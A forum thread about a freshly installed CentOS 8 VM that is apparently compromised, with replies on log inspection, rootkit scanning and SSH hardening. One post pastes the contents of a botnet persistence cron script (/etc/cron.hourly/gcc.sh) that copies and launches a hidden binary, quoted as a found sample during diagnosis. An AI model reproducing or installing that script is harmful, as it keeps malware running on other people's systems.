Serious - Need help - CentOS8 - VM - Probably compromised
Ok, so finally it happened. A couple of days ago I installed CentOS 8 on a VM... nothing else is configured. It's a brand-new custom ISO install.
Today I was checking the graphs/stats, and it looks like the server has been maxing out its CPU for the past 2 days, with outbound network activity at almost full port speed...
I am perplexed as to what may have happened. I have shut down the VM for now... to make sure nothing worse can happen (I think).
I know a quick fix is to reinstall. Since there is no data on the server, as it's a fresh install, I'm OK with doing that, but I would rather learn how to troubleshoot this.
Is there something I can check to find out the reason for the outbound traffic? Is my server compromised? If so, what logs can I check? How can I tell if some malicious user is wreaking havoc? And what was causing the 100% CPU (per the provider's chart)?
Any advice is appreciated.
Thanks in advance.
Comments
Reboot into a rescue cd and inspect your logs for indicators of compromise.
If I were a betting man $7 would say it's SSH bruteforce and whoever got in is launching DoS attacks. That would explain the traffic and the CPU.
Most likely compromised. I honestly would not even bother with the logs, since whether it's compromised or not, the course of action is the same: just reinstall.
Make sure you harden your SSH after the reinstall.
Would you be a bit more specific about which logs might provide this info? Thanks
Hmm. That seems to be the best option. But I was just trying to see if there is any rogue script somewhere going crazy...
In terms of hardening, what are your recommendations? Thanks
I'm not a CentOS person, but the equivalent of /var/log/auth.log should give you a clue as to how/who logged in and from where (unless it's a more sophisticated attack which also wipes its traces - which means it is going to be interesting, to say the least). That should be your first go-to place when you're inspecting the system via rescue boot.
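On CentOS/RHEL that file is /var/log/secure. Here's a sketch of the kind of greps worth running against it; the sample log lines below are made up purely for illustration, and from a rescue boot you would point LOG at the mounted system's copy (e.g. /mnt/var/log/secure) instead:

```shell
# Illustration only: build a tiny fake auth log. On the real system,
# set LOG to the mounted copy instead, e.g. LOG=/mnt/var/log/secure
LOG=$(mktemp)
cat > "$LOG" <<'EOF'
Jan 10 03:12:01 vm sshd[911]: Failed password for root from 203.0.113.7 port 40022 ssh2
Jan 10 03:12:05 vm sshd[915]: Accepted password for root from 203.0.113.7 port 40031 ssh2
EOF

# Successful logins: who got in, with which method, and from where
grep 'Accepted' "$LOG"

# Failed attempts grouped by source IP -- a tall count means brute force
grep 'Failed password' "$LOG" | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn | head
```

A long run of "Failed password" followed by a single "Accepted" from the same IP is the classic brute-force signature.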
Disable password logins entirely and go fully key-based. Firewall your SSH port (whitelist your IPs if that is feasible). To reduce the typical junk scripts scanning you, try changing your SSH port to something unusual (this reduces noise in your logs; it doesn't really "secure" your SSH).
There are lots of other things - fail2ban for e.g. Pick your poison - there's enough well documented stuff on improving SSH security.
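As a concrete sketch, the advice above in /etc/ssh/sshd_config form (directive names are stock OpenSSH; the port number is an arbitrary example I picked). Validate with `sshd -t` and restart sshd afterwards:

```
# /etc/ssh/sshd_config (fragment)
PasswordAuthentication no          # key-based logins only
PermitRootLogin prohibit-password  # root via key at most, or "no" entirely
Port 49222                         # arbitrary high port: cuts scanner noise, not real security
```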
/var/log/secure
To be clear I absolutely recommend reinstalling, but I think there's value in finding how your system was compromised. That way you know where you need to improve security measures for next time.
Looks like it got botrekt.
Have a look at top or htop to see the running processes. It will update in real-time and show you what’s using 100% CPU.
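If you can't watch it live, a one-shot snapshot works too (standard procps `ps`):

```shell
# Processes sorted by CPU usage, heaviest first -- a botnet binary
# usually sits right at the top at ~100%
ps aux --sort=-%cpu | head -n 6
```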
It definitely sounds like a compromised system. Would always recommend securing SSH as a minimum after installing any OS.
Running RKhunter and the likes might help determine what it's infected with, I believe.
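A sketch of doing that on CentOS 8, assuming the rkhunter package comes from EPEL (run as root; these need network access):

```shell
# rkhunter isn't in the base repos on CentOS 8; EPEL carries it
dnf install -y epel-release && dnf install -y rkhunter
rkhunter --update        # refresh the data files it matches against
rkhunter --check --sk    # --sk skips the "press enter" prompts
grep -i warning /var/log/rkhunter/rkhunter.log   # review what was flagged
```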
Netstat to show open connections.
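On CentOS 8, netstat is mostly superseded by `ss` from iproute2; either will show which process owns the sockets pushing all that traffic:

```shell
# TCP/UDP sockets, numeric addresses, owning processes
# (process names need root; "netstat -tunap" is the legacy equivalent)
ss -tunap
```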
Since you're running a VM, I'd suggest you re-install first, because if this is DDoS or spam or something shady like that, you're probably going to get your VM kicked off the provider's servers for abuse.
Re-install, then follow a quality hardening manual.
If you're coming in via console just don't enable the network. Investigate as long as you want.
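For example (tool availability depends on the image, and "eth0" is a placeholder interface name):

```shell
# Keep only console access while investigating: take networking down
nmcli networking off        # NetworkManager systems (CentOS 8 default)
# or, without NetworkManager:
ip link set dev eth0 down   # eth0 is a placeholder; see "ip link" for real names
```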
We have 5 honeypot systems configured to evaluate default security configuration in various CentOS, Redhat, Debian, Ubuntu, Mint versions. The only systems that were compromised were due to the following:
1. SSH root password with less than 8 characters (no special characters)
2. CentOS 7 base install without running yum updates
3. Debian 6 base install vulnerabilities (with apt updates)
4. Ubuntu 16 server base install without apt updates
So based on our findings, I assume that either you didn't run yum update after install, or your SSH password is shorter than 8 characters with no special characters. What kind of customizations are done to your ISO?
For some reason, there is no such file for me.
Thanks. I just installed it.
[17:12:36] Warning: Checking for possible rootkit files and directories [ Warning ]
[17:12:36] Found file '/etc/cron.hourly/gcc.sh'. Possible rootkit: BillGates botnet component
[17:12:36]
the file in cron:
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Not sure what is wrong here.... any suggestions?
The password is 8 characters, alphanumeric.
Yes, I probably did not run yum update.
It's a standard ISO provided by the provider... never had issues in general.
Not running the yum upgrade will leave your system vulnerable to several exploits depending on the version used. It is absolutely necessary to upgrade for security reasons.
It was CentOS 8.2. So I was a little lax here... I usually get to that, but somehow I left it for the coming weekend to work on...
and this happened.
2 steps that I always do first:
1. Update = good check for connectivity, amongst other things.
2. Add authorized_keys and turn off SSH password authentication.
Then it can idle until I set up CSF etc., but usually I just power down until I'm ready to do further installs/configuration. In the time it takes to do those first two steps, I've seen failed login attempts easily exceed a thousand with some server providers.
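Step 2 looks roughly like this on the client side. The key path here is a temp dir purely for demonstration (normally you'd accept the default ~/.ssh/id_ed25519), and the server address is a placeholder:

```shell
# Generate an Ed25519 keypair; the comment (-C) identifies the device
key=$(mktemp -d)/id_ed25519      # demo path; normally ~/.ssh/id_ed25519
ssh-keygen -t ed25519 -N '' -C "work-laptop" -f "$key"
cat "$key.pub"

# Then install the public key into the server's authorized_keys
# (placeholder address) BEFORE turning off password auth:
#   ssh-copy-id -i "$key.pub" root@203.0.113.10
```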
Here's a similar case: https://stackoverflow.com/questions/36623596/is-this-file-gcc-sh-in-cron-hourly-malware
I'm pretty sure there's nothing useful in /var/log. Probably there's nothing, because they try to hide how they got in.
You're saying that all three of these systems can be compromised remotely by means other than exploiting a weak root password?
Not just once a week.
[Soz]
Thanks all. What's a quick, easy way to disable all outgoing connections from my VPS?
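One way, with iptables (run as root over the console, since firewall mistakes can cut you off; this is a sketch, not a complete firewall):

```shell
# Let already-established flows (e.g. your current SSH session) continue...
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# ...then drop every new outbound connection by default
iptables -P OUTPUT DROP

# firewalld alternative on CentOS 8 -- note that panic mode blocks ALL
# traffic, including your own SSH session:
#   firewall-cmd --panic-on
```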
Sigh. Everyone, please just turn off password auth unless you DO use an 18+ character randomly generated password from a tool (using the FULL character set).
@vimalware how about fail2ban rather than a complicated password???
Not effective.
No. Just no.
Take 5mins and teach your users about public key crypto.
private key: your eyes only.
public key: required on all systems you need to talk to.
While I agree that using keys instead of passwords should be the way to go, one should note that this table and the given times are kind of meaningless without specifying the cracking setup.
Most likely you will only achieve those times if you're already in possession of the hash, so you can brute-force it directly on whatever powerful system you have.
The usual attacks against SSH still involve connection limits, latency and such, so it will for sure take a lot longer to brute-force even an 8 mixed-character password directly. Things like fail2ban add to that time frame, simply because an attacker then needs to cycle through tons of IPs or dial down the frequency.
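For reference, a minimal fail2ban jail for sshd might look like this (times given in seconds; the thresholds are arbitrary examples, not recommendations):

```
# /etc/fail2ban/jail.local (fragment)
[sshd]
enabled  = true
maxretry = 5       # this many failed attempts...
findtime = 600     # ...within this many seconds triggers a ban
bantime  = 3600    # ban length in seconds
```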
Yes, fail2ban is still useful (a little) against random attacks, even on the default config.
I don't know about massive brute-force attacks.
Yes you're right. I have posted the wrong image for this context.
This is for hashed password dumps.
Thank you all. At least for now I know what the malware was. But I haven't figured out anything from the logs.
So many people suggest Key based authentication...
How does that work when I have multiple devices to log in from? Like my phone / home laptop / work laptop / an idling VPS... What's the best way to set up keys? Also, if one private key on a device is compromised, wouldn't the attacker be able to remove the other keys from the server?
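The usual pattern is one keypair per device, each public key on its own line in the server's ~/.ssh/authorized_keys, so a lost device is revoked by deleting one line. And yes: anyone who can log in to the account can edit that file, so one compromised key does put the other keys on that account at risk (per-account separation or forced commands can mitigate this, but that's beyond a quick sketch). This demo uses a temp file with fake keys in place of the real authorized_keys:

```shell
# Stand-in for ~/.ssh/authorized_keys on the server (fake keys)
ak=$(mktemp)
cat > "$ak" <<'EOF'
ssh-ed25519 AAAAC3Nz...FAKE1 phone
ssh-ed25519 AAAAC3Nz...FAKE2 home-laptop
EOF

# Phone stolen? Revoke just its key by deleting its line:
sed -i '/ phone$/d' "$ak"
cat "$ak"    # only home-laptop remains
```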
Thank you